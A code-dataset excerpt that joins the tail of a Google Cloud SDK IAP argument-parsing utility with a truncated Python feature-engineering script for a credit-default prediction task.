group.add_argument(\n '--service',\n help='Service name. Required with `--resource-type=backend-services`.')\n\n\ndef AddIapSettingArg(parser):\n \"\"\"Adds flags for an IAP settings resource.\n\n Args:\n parser: An argparse.ArgumentParser-like object. It is mocked out in order to\n capture some information, but behaves like an ArgumentParser.\n \"\"\"\n group = parser.add_group()\n group.add_argument('--organization', help='Organization ID.')\n group.add_argument('--folder', help='Folder ID.')\n group.add_argument('--project', help='Project ID.')\n group.add_argument(\n '--resource-type',\n choices=SETTING_RESOURCE_TYPE_ENUM,\n help='Resource type of the IAP resource.')\n group.add_argument(\n '--service',\n help='Service name. Required when resource type is ``app-engine'', optional when resource type is ``compute''.'\n )\n group.add_argument(\n '--version',\n help='Version name. Optional when resource type is ``app-engine''.')\n\n\ndef AddOauthClientArgs(parser):\n \"\"\"Adds OAuth client args.\n\n Args:\n parser: An argparse.ArgumentParser-like object. It is mocked out in order to\n capture some information, but behaves like an ArgumentParser.\n \"\"\"\n group = parser.add_group()\n group.add_argument(\n '--oauth2-client-id',\n required=True,\n help='OAuth 2.0 client ID to use.')\n group.add_argument(\n '--oauth2-client-secret',\n required=True,\n help='OAuth 2.0 client secret to use.')\n\n\ndef AddAddIamPolicyBindingArgs(parser):\n # TODO(b/123070972) Add completers\n iam_util.AddArgsForAddIamPolicyBinding(\n parser,\n add_condition=True)\n\n\ndef AddRemoveIamPolicyBindingArgs(parser):\n # TODO(b/123070972) Add completers\n iam_util.AddArgsForRemoveIamPolicyBinding(\n parser,\n add_condition=True)\n\n\ndef AddIAMPolicyFileArg(parser):\n \"\"\"Adds flags for an IAM policy file.\n\n Args:\n parser: An argparse.ArgumentParser-like object. It is mocked out in order to\n capture some information, but behaves like an ArgumentParser.\n \"\"\"\n parser.add_argument(\n 'policy_file', help='JSON or YAML file containing the IAM policy.')\n\n\ndef AddIapSettingFileArg(parser):\n \"\"\"Add flags for the IAP setting file.\n\n Args:\n parser: An argparse.ArgumentParser-like object. It is mocked out in order to\n capture some information, but behaves like an ArgumentParser.\n \"\"\"\n parser.add_argument(\n 'setting_file', help='JSON file containing the IAP resource settings')\n\n\ndef ParseIapIamResource(release_track, args):\n \"\"\"Parse an IAP IAM resource from the input arguments.\n\n Args:\n release_track: base.ReleaseTrack, release track of command.\n args: an argparse namespace. All the arguments that were provided to this\n command invocation.\n\n Raises:\n calliope_exc.InvalidArgumentException: if a provided argument does not apply\n to the specified resource type.\n iap_exc.InvalidIapIamResourceError: if an IapIamResource could not be parsed\n from the arguments.\n\n Returns:\n The specified IapIamResource\n \"\"\"\n project = properties.VALUES.core.project.GetOrFail()\n if not args.resource_type:\n if args.service:\n raise calliope_exc.InvalidArgumentException(\n '--service',\n '`--service` cannot be specified without `--resource-type`.')\n if args.version:\n raise calliope_exc.InvalidArgumentException(\n '--version',\n '`--version` cannot be specified without `--resource-type`.')\n return iap_api.IAPWeb(\n release_track,\n project)\n elif args.resource_type == APP_ENGINE_RESOURCE_TYPE:\n if args.service and args.version:\n return iap_api.AppEngineServiceVersion(\n release_track,\n project,\n args.service,\n args.version)\n elif args.service:\n return iap_api.AppEngineService(\n release_track,\n project,\n args.service)\n if args.version:\n raise calliope_exc.InvalidArgumentException(\n '--version',\n '`--version` cannot be specified without `--service`.')\n return iap_api.AppEngineApplication(\n release_track,\n project)\n elif args.resource_type == BACKEND_SERVICES_RESOURCE_TYPE:\n if args.version:\n raise calliope_exc.InvalidArgumentException(\n '--version',\n '`--version` cannot be specified for '\n '`--resource-type=backend-services`.')\n if args.service:\n return iap_api.BackendService(\n release_track,\n project,\n args.service)\n return iap_api.BackendServices(\n release_track,\n project)\n\n # This shouldn't be reachable, based on the IAP IAM resource parsing logic.\n raise iap_exc.InvalidIapIamResourceError('Could not parse IAP IAM resource.')\n\n\ndef ParseIapResource(release_track, args):\n \"\"\"Parse an IAP resource from the input arguments.\n\n Args:\n release_track: base.ReleaseTrack, release track of command.\n args: an argparse namespace. All the arguments that were provided to this\n command invocation.\n\n Raises:\n calliope_exc.InvalidArgumentException: if `--version` was specified with\n resource type 'backend-services'.\n iap_exc.InvalidIapIamResourceError: if an IapIamResource could not be parsed\n from the arguments.\n\n Returns:\n The specified IapIamResource\n \"\"\"\n project = properties.VALUES.core.project.GetOrFail()\n if args.resource_type:\n if args.resource_type == APP_ENGINE_RESOURCE_TYPE:\n if args.service:\n raise calliope_exc.InvalidArgumentException(\n '--service',\n '`--service` cannot be specified for '\n '`--resource-type=app-engine`.')\n return iap_api.AppEngineApplication(\n release_track,\n project)\n elif args.resource_type == BACKEND_SERVICES_RESOURCE_TYPE:\n if not args.service:\n raise calliope_exc.RequiredArgumentException(\n '--service',\n '`--service` must be specified for '\n '`--resource-type=backend-services`.')\n return iap_api.BackendService(\n release_track,\n project,\n args.service)\n\n raise iap_exc.InvalidIapIamResourceError('Could not parse IAP resource.')\n\n\ndef ParseIapSettingsResource(release_track, args):\n \"\"\"Parse an IAP setting resource from the input arguments.\n\n Args:\n release_track: base.ReleaseTrack, release track of command.\n args: an argparse namespace. All the arguments that were provided to this\n command invocation.\n\n Raises:\n calliope_exc.InvalidArgumentException: if `--version` was specified with\n resource type 'backend-services'.\n\n Returns:\n The specified IapSettingsResource\n \"\"\"\n if args.organization:\n if args.resource_type:\n raise calliope_exc.InvalidArgumentException(\n '--resource-type',\n '`--resource-type` should not be specified at organization level')\n if args.project:\n raise calliope_exc.InvalidArgumentException(\n '--project',\n '`--project` should not be specified at organization level')\n return iap_api.IapSettingsResource(\n release_track, 'organizations/{0}'.format(args.organization))\n if args.folder:\n if args.resource_type:\n raise calliope_exc.InvalidArgumentException(\n '--resource-type',\n '`--resource-type` should not be specified at folder level')\n if args.project:\n raise calliope_exc.InvalidArgumentException(\n '--project', '`--project` should not be specified at folder level')\n return iap_api.IapSettingsResource(release_track,\n 'folders/{0}'.format(args.folder))\n if args.project:\n if not args.resource_type:\n return iap_api.IapSettingsResource(release_track,\n 'projects/{0}'.format(args.project))\n else:\n if args.resource_type == WEB_RESOURCE_TYPE:\n return iap_api.IapSettingsResource(\n release_track, 'projects/{0}/iap_web'.format(args.project))\n elif args.resource_type == APP_ENGINE_RESOURCE_TYPE:\n if not args.service:\n raise calliope_exc.RequiredArgumentException(\n '--service', '`--service` must be specified for '\n '`--resource-type=app-engine`.')\n else:\n if args.version:\n return iap_api.IapSettingsResource(\n release_track,\n 'projects/{0}/iap_web/appengine-{1}/services/{2}/versions/{3}'\n .format(args.project, args.project, args.service, args.version))\n else:\n return iap_api.IapSettingsResource(\n release_track,\n 'projects/{0}/iap_web/appengine-{1}/services/{2}'.format(\n args.project, args.project, args.service))\n elif args.resource_type == COMPUTE_RESOURCE_TYPE:\n if args.service:\n return iap_api.IapSettingsResource(\n release_track, 'projects/{0}/iap_web/compute/services/{1}'.format(\n args.project, args.service))\n else:\n return iap_api.IapSettingsResource(\n release_track,\n 'projects/{0}/iap_web/compute'.format(args.project))\n else:\n raise iap_exc.InvalidIapIamResourceError(\n 'Unsupported IAP settings resource type.')\n\n raise iap_exc.InvalidIapIamResourceError(\n 'Could not parse IAP settings resource.')\n","sub_path":"google-cloud-sdk/lib/googlecloudsdk/command_lib/iap/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":11949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"72578707","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 28 14:24:32 2018\n\n@author: neha\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 27 20:12:07 2018\n\n@author: neha\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier, ExtraTreesClassifier\nfrom sklearn.metrics import make_scorer, auc, confusion_matrix, accuracy_score, f1_score, precision_score, recall_score, roc_auc_score, roc_curve\nimport lightgbm as lgb\nimport xgboost as xgb\nimport random\nimport pickle\nimport matplotlib.pyplot as plt\nfrom imblearn.over_sampling import SMOTE\nfrom sklearn.decomposition import PCA\nfrom lightgbm import LGBMClassifier, cv\nimport gc\nimport csv\nfrom sklearn.model_selection import KFold, StratifiedKFold\nfrom scipy import stats\nfrom sklearn.linear_model import LogisticRegression\n\n\n#################################################\n# load train and dev set skids\n#################################################\ndef get_train_dev_sets():\n with open(\"train_all.txt\", \"rb\") as fp:\n train_all_skid = pickle.load(fp)\n \n with open(\"dev_all.txt\", \"rb\") as fp:\n dev_all_skid = pickle.load(fp)\n \n with open(\"dev_eyeball.txt\", \"rb\") as fp:\n dev_eyeball_skid = pickle.load(fp)\n \n return train_all_skid, dev_all_skid, dev_eyeball_skid\n\n###############################################\n# from previous experiments, important columns\n###############################################\ndef get_base_important_columns():\n important_columns = ['CNT_CHILDREN', 'AMT_INCOME_TOTAL', 'AMT_CREDIT', 'AMT_ANNUITY',\n 'AMT_GOODS_PRICE', 'REGION_POPULATION_RELATIVE', 'DAYS_BIRTH',\n 'DAYS_EMPLOYED', 'DAYS_REGISTRATION', 'DAYS_ID_PUBLISH', 'OWN_CAR_AGE',\n 'FLAG_WORK_PHONE', 'CNT_FAM_MEMBERS', 'REGION_RATING_CLIENT_W_CITY',\n 'HOUR_APPR_PROCESS_START', 'REG_CITY_NOT_LIVE_CITY', 'EXT_SOURCE_1',\n 'EXT_SOURCE_2', 'EXT_SOURCE_3', 'APARTMENTS_AVG',\n 'YEARS_BEGINEXPLUATATION_AVG', 'YEARS_BUILD_AVG', 'FLOORSMAX_AVG',\n 'LIVINGAPARTMENTS_AVG', 'LIVINGAREA_AVG',\n 'YEARS_BEGINEXPLUATATION_MODE', 'FLOORSMAX_MODE',\n 'LIVINGAPARTMENTS_MODE', 'APARTMENTS_MEDI', 'BASEMENTAREA_MEDI',\n 'FLOORSMIN_MEDI', 'LIVINGAREA_MEDI', 'NONLIVINGAREA_MEDI',\n 'TOTALAREA_MODE', 'OBS_30_CNT_SOCIAL_CIRCLE',\n 'DEF_30_CNT_SOCIAL_CIRCLE', 'OBS_60_CNT_SOCIAL_CIRCLE',\n 'DEF_60_CNT_SOCIAL_CIRCLE', 'DAYS_LAST_PHONE_CHANGE', 'FLAG_DOCUMENT_2',\n 'FLAG_DOCUMENT_3', 'FLAG_DOCUMENT_16', 'FLAG_DOCUMENT_18',\n 'FLAG_DOCUMENT_21', 'AMT_REQ_CREDIT_BUREAU_MON',\n 'AMT_REQ_CREDIT_BUREAU_QRT', 'AMT_REQ_CREDIT_BUREAU_YEAR',\n 'NAME_CONTRACT_TYPE_Cash loans', 'NAME_CONTRACT_TYPE_Revolving loans',\n 'CODE_GENDER_F', 'CODE_GENDER_M', 'FLAG_OWN_CAR_N', 'FLAG_OWN_CAR_Y',\n 'NAME_INCOME_TYPE_Commercial associate',\n 'NAME_INCOME_TYPE_Maternity leave', 'NAME_INCOME_TYPE_Unemployed',\n 'NAME_INCOME_TYPE_Working', 'NAME_EDUCATION_TYPE_Higher education',\n 'NAME_EDUCATION_TYPE_Lower secondary',\n 'NAME_EDUCATION_TYPE_Secondary / secondary special',\n 'NAME_FAMILY_STATUS_Civil marriage', 'NAME_FAMILY_STATUS_Married',\n 'NAME_FAMILY_STATUS_Separated', 'NAME_HOUSING_TYPE_House / apartment',\n 'NAME_HOUSING_TYPE_Municipal apartment',\n 'NAME_HOUSING_TYPE_Rented apartment', 'OCCUPATION_TYPE_Core staff',\n 'OCCUPATION_TYPE_Drivers', 'OCCUPATION_TYPE_Laborers',\n 'OCCUPATION_TYPE_Low-skill Laborers', 'OCCUPATION_TYPE_Sales staff',\n 'WEEKDAY_APPR_PROCESS_START_FRIDAY',\n 'WEEKDAY_APPR_PROCESS_START_SATURDAY',\n 'ORGANIZATION_TYPE_Business Entity Type 3',\n 'ORGANIZATION_TYPE_Construction', 'ORGANIZATION_TYPE_Industry: type 1',\n 'ORGANIZATION_TYPE_Mobile', 'ORGANIZATION_TYPE_Realtor',\n 'ORGANIZATION_TYPE_Self-employed', 'ORGANIZATION_TYPE_Trade: type 7',\n 'ORGANIZATION_TYPE_Transport: type 3', 'loan_annutiy_ratio']\n \n return important_columns\n\n###################################\n# get False positive rate\n###################################\ndef get_FPR(y_true, y_pred):\n cm = confusion_matrix(y_true, y_pred)\n FP = cm[0][1]\n TN = cm[0][0]\n FPR = FP/(FP+TN)\n return FPR\n\n\ndef get_scores(y_true, y_predict, y_predict_proba, mode):\n scores_df = pd.Series()\n\n scores_df[mode+'_roc_auc'] = roc_auc_score(y_true, y_predict_proba)\n scores_df[mode+'_accuracy'] = accuracy_score(y_true, y_predict)\n scores_df[mode+'_recall'] = recall_score(y_true, y_predict)\n scores_df[mode+'_fpr'] = get_FPR(y_true, y_predict)\n scores_df[mode+'_precision'] = precision_score(y_true, y_predict)\n scores_df[mode+'_f1'] = f1_score(y_true, y_predict)\n \n return scores_df\n####################################################################\n# One-hot encoding for categorical columns with get_dummies\n####################################################################\ndef one_hot_encoder(df, nan_as_category = True):\n original_columns = list(df.columns)\n categorical_columns = list(df.select_dtypes(['object']).columns)\n df = pd.get_dummies(df, columns= categorical_columns, dummy_na= nan_as_category)\n new_columns = [c for c in df.columns if c not in original_columns]\n return df, new_columns\n\n##################################################################\n# measure the slope of the time series\n##################################################################\ndef linear_fit(df):\n col_x = df.columns[0]\n col_y = df.columns[1]\n \n y = df[col_x].values\n x = df[col_y].values\n \n slope, intercept, r_value, p_value, std_err = stats.linregress(x,y)\n \n return slope\n#####################################################################\n# get application train test features\n####################################################################\n\ndef get_application_train_test(nan_as_category=False):\n application_train = pd.read_csv('application_train.csv') # (307511, 122)\n application_test = pd.read_csv('application_test.csv') # (48744, 121)\n \n one_hot_df = application_train.append(application_test).reset_index()\n\n del application_train, application_test\n gc.collect()\n # Optional: Remove 4 applications with XNA CODE_GENDER (train set)\n one_hot_df = one_hot_df[one_hot_df['CODE_GENDER'] != 'XNA']\n \n # Categorical features with Binary encode (0 or 1; two categories)\n for bin_feature in ['CODE_GENDER', 'FLAG_OWN_CAR', 'FLAG_OWN_REALTY']:\n one_hot_df[bin_feature], uniques = pd.factorize(one_hot_df[bin_feature])\n \n mean_EXT_SOURCE_1 = one_hot_df[~one_hot_df.isnull()].EXT_SOURCE_1.mean()\n mean_EXT_SOURCE_3 = one_hot_df[~one_hot_df.isnull()].EXT_SOURCE_3.mean()\n \n one_hot_df['EXT_SOURCE_1'] = one_hot_df['EXT_SOURCE_1'].fillna(mean_EXT_SOURCE_1)\n one_hot_df['EXT_SOURCE_3'] = one_hot_df['EXT_SOURCE_3'].fillna(mean_EXT_SOURCE_3)\n \n # NaN values for DAYS_EMPLOYED: 365.243 -> nan\n one_hot_df['DAYS_EMPLOYED'].replace(365243, np.nan, inplace= True)\n \"\"\"\n one_hot_df.loc[one_hot_df['OWN_CAR_AGE'] > 80, 'OWN_CAR_AGE'] = np.nan\n one_hot_df.loc[one_hot_df['REGION_RATING_CLIENT_W_CITY'] < 0, 'REGION_RATING_CLIENT_W_CITY'] = np.nan\n one_hot_df.loc[one_hot_df['AMT_INCOME_TOTAL'] > 1e8, 'AMT_INCOME_TOTAL'] = np.nan\n one_hot_df.loc[one_hot_df['AMT_REQ_CREDIT_BUREAU_QRT'] > 10, 'AMT_REQ_CREDIT_BUREAU_QRT'] = np.nan\n one_hot_df.loc[one_hot_df['OBS_30_CNT_SOCIAL_CIRCLE'] > 40, 'OBS_30_CNT_SOCIAL_CIRCLE'] = np.nan\n \"\"\"\n \n \n docs = [_f for _f in one_hot_df.columns if 'FLAG_DOC' in _f]\n live = [_f for _f in one_hot_df.columns if ('FLAG_' in _f) & ('FLAG_DOC' not in _f) & ('_FLAG_' not in _f)]\n \n inc_by_org = one_hot_df[['AMT_INCOME_TOTAL', 'ORGANIZATION_TYPE']].groupby('ORGANIZATION_TYPE').median()['AMT_INCOME_TOTAL']\n\n # Some simple new features (percentages)\n #one_hot_df['loan_annutiy_ratio']=one_hot_df['AMT_CREDIT']/one_hot_df['AMT_ANNUITY']\n #one_hot_df['DAYS_EMPLOYED_PERC'] = one_hot_df['DAYS_EMPLOYED'] / one_hot_df['DAYS_BIRTH']\n #one_hot_df['INCOME_CREDIT_PERC'] = one_hot_df['AMT_INCOME_TOTAL'] / one_hot_df['AMT_CREDIT']\n one_hot_df['INCOME_PER_PERSON'] = one_hot_df['AMT_INCOME_TOTAL'] / one_hot_df['CNT_FAM_MEMBERS']\n #one_hot_df['ANNUITY_INCOME_PERC'] = one_hot_df['AMT_ANNUITY'] / one_hot_df['AMT_INCOME_TOTAL']\n one_hot_df['PAYMENT_RATE'] = one_hot_df['AMT_ANNUITY'] / one_hot_df['AMT_CREDIT']\n one_hot_df['CHILDREN_RATIO'] = one_hot_df['CNT_CHILDREN'] / one_hot_df['CNT_FAM_MEMBERS']\n \n one_hot_df['NEW_CREDIT_TO_GOODS_RATIO'] = one_hot_df['AMT_CREDIT'] / one_hot_df['AMT_GOODS_PRICE']\n one_hot_df['NEW_DOC_IND_KURT'] = one_hot_df[docs].kurtosis(axis=1)\n one_hot_df['NEW_LIVE_IND_SUM'] = one_hot_df[live].sum(axis=1)\n one_hot_df['NEW_INC_PER_CHLD'] = one_hot_df['AMT_INCOME_TOTAL'] / (1 + one_hot_df['CNT_CHILDREN'])\n one_hot_df['NEW_INC_BY_ORG'] = one_hot_df['ORGANIZATION_TYPE'].map(inc_by_org)\n one_hot_df['NEW_EMPLOY_TO_BIRTH_RATIO'] = one_hot_df['DAYS_EMPLOYED'] / one_hot_df['DAYS_BIRTH']\n one_hot_df['NEW_ANNUITY_TO_INCOME_RATIO'] = one_hot_df['AMT_ANNUITY'] / (1 + one_hot_df['AMT_INCOME_TOTAL'])\n one_hot_df['NEW_SOURCES_PROD'] = one_hot_df['EXT_SOURCE_1'] * one_hot_df['EXT_SOURCE_2'] * one_hot_df['EXT_SOURCE_3']\n one_hot_df['NEW_EXT_SOURCES_MEAN'] = one_hot_df[['EXT_SOURCE_1', 'EXT_SOURCE_2', 'EXT_SOURCE_3']].mean(axis=1)\n one_hot_df['NEW_SCORES_STD'] = one_hot_df[['EXT_SOURCE_1', 'EXT_SOURCE_2', 'EXT_SOURCE_3']].std(axis=1)\n one_hot_df['NEW_SCORES_STD'] = one_hot_df['NEW_SCORES_STD'].fillna(one_hot_df['NEW_SCORES_STD'].mean())\n one_hot_df['NEW_CAR_TO_BIRTH_RATIO'] = one_hot_df['OWN_CAR_AGE'] / one_hot_df['DAYS_BIRTH']\n one_hot_df['NEW_CAR_TO_EMPLOY_RATIO'] = one_hot_df['OWN_CAR_AGE'] / one_hot_df['DAYS_EMPLOYED']\n one_hot_df['NEW_PHONE_TO_BIRTH_RATIO'] = one_hot_df['DAYS_LAST_PHONE_CHANGE'] / one_hot_df['DAYS_BIRTH']\n one_hot_df['NEW_PHONE_TO_BIRTH_RATIO_EMPLOYER'] = one_hot_df['DAYS_LAST_PHONE_CHANGE'] / one_hot_df['DAYS_EMPLOYED']\n one_hot_df['NEW_CREDIT_TO_INCOME_RATIO'] = one_hot_df['AMT_CREDIT'] / one_hot_df['AMT_INCOME_TOTAL']\n \n dropcolum=['FLAG_DOCUMENT_2','FLAG_DOCUMENT_4',\n 'FLAG_DOCUMENT_5','FLAG_DOCUMENT_6','FLAG_DOCUMENT_7',\n 'FLAG_DOCUMENT_8','FLAG_DOCUMENT_9','FLAG_DOCUMENT_10', \n 'FLAG_DOCUMENT_11','FLAG_DOCUMENT_12','FLAG_DOCUMENT_13',\n 'FLAG_DOCUMENT_14','FLAG_DOCUMENT_15','FLAG_DOCUMENT_16',\n 'FLAG_DOCUMENT_17','FLAG_DOCUMENT_18','FLAG_DOCUMENT_19',\n 'FLAG_DOCUMENT_20','FLAG_DOCUMENT_21']\n one_hot_df= one_hot_df.drop(dropcolum,axis=1)\n\n one_hot_df, cat_cols = one_hot_encoder(one_hot_df, nan_as_category)\n\n return one_hot_df\n\n#########################################\n# bureau_features\n#########################################\ndef get_bureau_features(nan_as_category = False):\n \n bureau = pd.read_csv('bureau.csv')\n bureau, bureau_cat = one_hot_encoder(bureau, nan_as_category)\n \n cat_aggregations = {}\n for cat in bureau_cat: \n cat_aggregations[cat] = ['mean', 'sum']\n \n bureau['PAYMENT_RATE'] = bureau['AMT_CREDIT_SUM'] / bureau['AMT_ANNUITY']\n \n agg_dict= {\n #'SK_ID_CURR': ['count'],\n 'DAYS_CREDIT': ['min', 'max', 'mean', 'var'],\n 'CREDIT_DAY_OVERDUE': ['max', 'mean'],\n 'DAYS_CREDIT_ENDDATE': ['sum', 'min', 'max', 'mean'],\n 'DAYS_CREDIT_UPDATE': ['mean'],\n 'DAYS_ENDDATE_FACT': ['sum', 'min', 'max'],\n 'AMT_CREDIT_MAX_OVERDUE': ['sum', 'mean'], \n 'CNT_CREDIT_PROLONG': ['sum'], \n 'AMT_CREDIT_SUM': ['sum', 'max', 'mean'], \n 'AMT_CREDIT_SUM_DEBT': ['max', 'mean', 'sum'], \n 'AMT_CREDIT_SUM_LIMIT': ['sum', 'mean'], \n 'AMT_CREDIT_SUM_OVERDUE': ['sum', 'mean'], \n 'AMT_ANNUITY': ['sum', 'max', 'mean'],\n 'PAYMENT_RATE': ['min', 'max', 'sum']\n }\n \n \n bureau_features = bureau.groupby('SK_ID_CURR').agg({**agg_dict, **cat_aggregations})\n bureau_features.columns = pd.Index(['BURO_' + e[0] + \"_\" + e[1].upper() for e in bureau_features.columns.tolist()])\n bureau_features = bureau_features.reset_index()\n \n # Bureau: Active credits - using only numerical aggregations\n active = bureau[bureau['CREDIT_ACTIVE_Active'] == 1]\n active_agg = active.groupby('SK_ID_CURR').agg(agg_dict)\n active_agg.columns = pd.Index(['ACTIVE_' + e[0] + \"_\" + e[1].upper() for e in active_agg.columns.tolist()])\n active_agg = active_agg.reset_index()\n \n bureau_features = pd.merge(bureau_features, active_agg, how='left', on='SK_ID_CURR')\n \n del active, active_agg\n gc.collect()\n \n # Bureau: Closed credits - using only numerical aggregations\n closed = bureau[bureau['CREDIT_ACTIVE_Closed'] == 1]\n closed_agg = closed.groupby('SK_ID_CURR').agg(agg_dict)\n closed_agg.columns = pd.Index(['CLOSED_' + e[0] + \"_\" + e[1].upper() for e in closed_agg.columns.tolist()])\n closed_agg = closed_agg.reset_index()\n \n bureau_features = pd.merge(bureau_features, closed_agg, how='left', on='SK_ID_CURR')\n \n \n del bureau, closed, closed_agg\n gc.collect()\n \n return bureau_features\n\ndef add_bureau_features(df, important_columns, mode):\n bureau_features = get_bureau_features()\n df = pd.merge(df, bureau_features, on='SK_ID_CURR', how='left')\n \n if mode != 'test':\n added_columns = list(bureau_features.columns)\n added_columns.remove('SK_ID_CURR')\n important_columns.extend(added_columns)\n \n return df, important_columns\n\n#########################################\n# bureau_balacne_features\n#########################################\ndef get_bureau_balance_features(nan_as_category=False):\n bureau_balance = pd.read_csv('bureau_balance.csv')\n bureau_balance, bb_cat = one_hot_encoder(bureau_balance, nan_as_category)\n\n agg_dict = {'MONTHS_BALANCE': ['min', 'max', 'size']}\n for col in bb_cat:\n agg_dict[col] = ['mean', 'count', 'sum']\n \n bureau_balance_agg = bureau_balance.groupby(['SK_ID_BUREAU']).agg(agg_dict).reset_index()\n bureau_balance_agg.columns = pd.Index(['BURO_BB_' + e[0] + \"_\" + e[1].upper() for e in bureau_balance_agg.columns.tolist()])\n\n \n del bureau_balance\n gc.collect()\n \n bureau = pd.read_csv('bureau.csv')\n \n bureau_balance_agg = pd.merge(bureau[['SK_ID_BUREAU', 'SK_ID_CURR']], bureau_balance_agg, left_on='SK_ID_BUREAU', right_on='BURO_BB_SK_ID_BUREAU_', how='left')\n \n del bureau\n gc.collect()\n \n agg_dict = { 'BURO_BB_STATUS_0_MEAN': ['mean', 'sum'], \n 'BURO_BB_STATUS_0_COUNT': ['mean', 'sum'], \n 'BURO_BB_STATUS_1_MEAN': ['mean', 'sum'], \n 'BURO_BB_STATUS_1_COUNT': ['mean', 'sum'], \n 'BURO_BB_STATUS_2_MEAN': ['mean', 'sum'], \n 'BURO_BB_STATUS_2_COUNT': ['mean', 'sum'], \n 'BURO_BB_STATUS_3_MEAN': ['mean', 'sum'], \n 'BURO_BB_STATUS_3_COUNT': ['mean', 'sum'], \n 'BURO_BB_STATUS_4_MEAN': ['mean', 'sum'], \n 'BURO_BB_STATUS_4_COUNT': ['mean', 'sum'], \n 'BURO_BB_STATUS_5_MEAN': ['mean', 'sum'], \n 'BURO_BB_STATUS_5_COUNT': ['mean', 'sum'], \n 'BURO_BB_STATUS_C_MEAN': ['mean', 'sum'], \n 'BURO_BB_STATUS_C_COUNT': ['mean', 'sum'], \n 'BURO_BB_STATUS_X_MEAN': ['mean', 'sum'], \n 'BURO_BB_STATUS_X_COUNT': ['mean', 'sum'], \n 'BURO_BB_MONTHS_BALANCE_MIN': ['min'],\n 'BURO_BB_MONTHS_BALANCE_MAX': ['max'],\n 'BURO_BB_MONTHS_BALANCE_SIZE': ['mean', 'sum']\n }\n bureau_balance_agg = bureau_balance_agg.groupby('SK_ID_CURR').agg(agg_dict).reset_index()\n bureau_balance_agg.columns = ['%s%s' % (a, '_%s' % b if b else '') for a, b in bureau_balance_agg.columns]\n \n return bureau_balance_agg\n\ndef add_bureau_balance_features(df, important_columns, mode):\n bureau_balance_features = get_bureau_balance_features()\n df = pd.merge(df, bureau_balance_features, on='SK_ID_CURR', how='left')\n \n if mode != 'test':\n added_columns = list(bureau_balance_features.columns)\n added_columns.remove('SK_ID_CURR')\n important_columns.extend(added_columns)\n \n return df, important_columns\n\n#########################################\n# previous application\n#########################################\n# Preprocess previous_applications.csv\ndef get_previous_applications_features(nan_as_category=False):\n prev = pd.read_csv('previous_application.csv')\n \n # removing the duplicate applications\n # Not wokring\n #prev = prev[(prev.NFLAG_LAST_APPL_IN_DAY == 1) & (prev.FLAG_LAST_APPL_PER_CONTRACT == 'Y')]\n \n prev, cat_cols = one_hot_encoder(prev, nan_as_category= True)\n\n # Days 365.243 values -> nan\n \n prev['DAYS_FIRST_DRAWING'].replace(365243, np.nan, inplace= True)\n prev['DAYS_FIRST_DUE'].replace(365243, np.nan, inplace= True)\n prev['DAYS_LAST_DUE_1ST_VERSION'].replace(365243, np.nan, inplace= True)\n prev['DAYS_LAST_DUE'].replace(365243, np.nan, inplace= True)\n prev['DAYS_TERMINATION'].replace(365243, np.nan, inplace= True)\n # Add feature: value ask / value received percentage\n \n prev['APP_CREDIT_PERC'] = 0\n prev.loc[prev['AMT_CREDIT'] != 0, 'APP_CREDIT_PERC'] = prev.loc[prev['AMT_CREDIT'] != 0,'AMT_APPLICATION'] / prev.loc[prev['AMT_CREDIT'] !=0, 'AMT_CREDIT']\n \n prev['PAYMENT_RATE'] = prev['AMT_ANNUITY'] / prev['AMT_CREDIT']\n prev['CREDIT_TO_GOODS_RATIO'] = prev['AMT_CREDIT'] / prev['AMT_GOODS_PRICE']\n\n\n # Previous applications numeric features\n num_aggregations = {\n 'SK_ID_PREV': ['count'],\n 'AMT_ANNUITY': ['min', 'max', 'mean', 'sum'],\n 'AMT_APPLICATION': ['min', 'max', 'mean', 'sum'],\n 'AMT_CREDIT': ['min', 'max', 'mean', 'sum'],\n 'APP_CREDIT_PERC': ['min', 'max', 'mean', 'var'],\n 'AMT_DOWN_PAYMENT': ['min', 'max', 'mean', 'sum'],\n 'AMT_GOODS_PRICE': ['min', 'max', 'mean', 'sum'],\n 'HOUR_APPR_PROCESS_START': ['min', 'max', 'mean'],\n 'RATE_DOWN_PAYMENT': ['min', 'max', 'mean', 'sum'],\n 'DAYS_DECISION': ['min', 'max', 'mean'],\n 'CNT_PAYMENT': ['mean', 'sum'],\n 'PAYMENT_RATE': ['min', 'max', 'mean'],\n 'CREDIT_TO_GOODS_RATIO': ['min', 'max', 'mean']\n }\n \n # Previous applications categorical features\n cat_aggregations = {}\n for cat in cat_cols:\n cat_aggregations[cat] = ['mean', 'sum']\n\n prev_agg = prev.groupby('SK_ID_CURR').agg({**num_aggregations, **cat_aggregations})\n prev_agg.columns = pd.Index(['PREV_' + e[0] + \"_\" + e[1].upper() for e in prev_agg.columns.tolist()])\n prev_agg = prev_agg.reset_index()\n\n # Previous Applications: Approved Applications - only numerical features\n approved = prev[prev['NAME_CONTRACT_STATUS_Approved'] == 1]\n approved_agg = approved.groupby('SK_ID_CURR').agg(num_aggregations)\n approved_agg.columns = pd.Index(['APPROVED_' + e[0] + \"_\" + e[1].upper() for e in approved_agg.columns.tolist()])\n approved_agg = approved_agg.reset_index()\n\n prev_agg = pd.merge(prev_agg, approved_agg, how='left', on='SK_ID_CURR')\n \n # Previous Applications: Refused Applications - only numerical features\n refused = prev[prev['NAME_CONTRACT_STATUS_Refused'] == 1]\n refused_agg = refused.groupby('SK_ID_CURR').agg(num_aggregations)\n refused_agg.columns = pd.Index(['REFUSED_' + e[0] + \"_\" + e[1].upper() for e in refused_agg.columns.tolist()])\n refused_agg = refused_agg.reset_index()\n\n prev_agg = pd.merge(prev_agg, refused_agg, how='left', on='SK_ID_CURR')\n \n del refused, refused_agg, approved, approved_agg, prev\n gc.collect()\n \n return prev_agg\n\ndef add_previous_applications_features(df, important_columns, mode):\n previous_applications_features = get_previous_applications_features()\n df = pd.merge(df, previous_applications_features, on='SK_ID_CURR', how='left')\n \n if mode != 'test':\n added_columns = list(previous_applications_features.columns)\n added_columns.remove('SK_ID_CURR')\n important_columns.extend(added_columns)\n \n return df, important_columns\n\n\n#########################################\n# POS Cash\n#########################################\ndef get_pos_cash_features():\n pos = 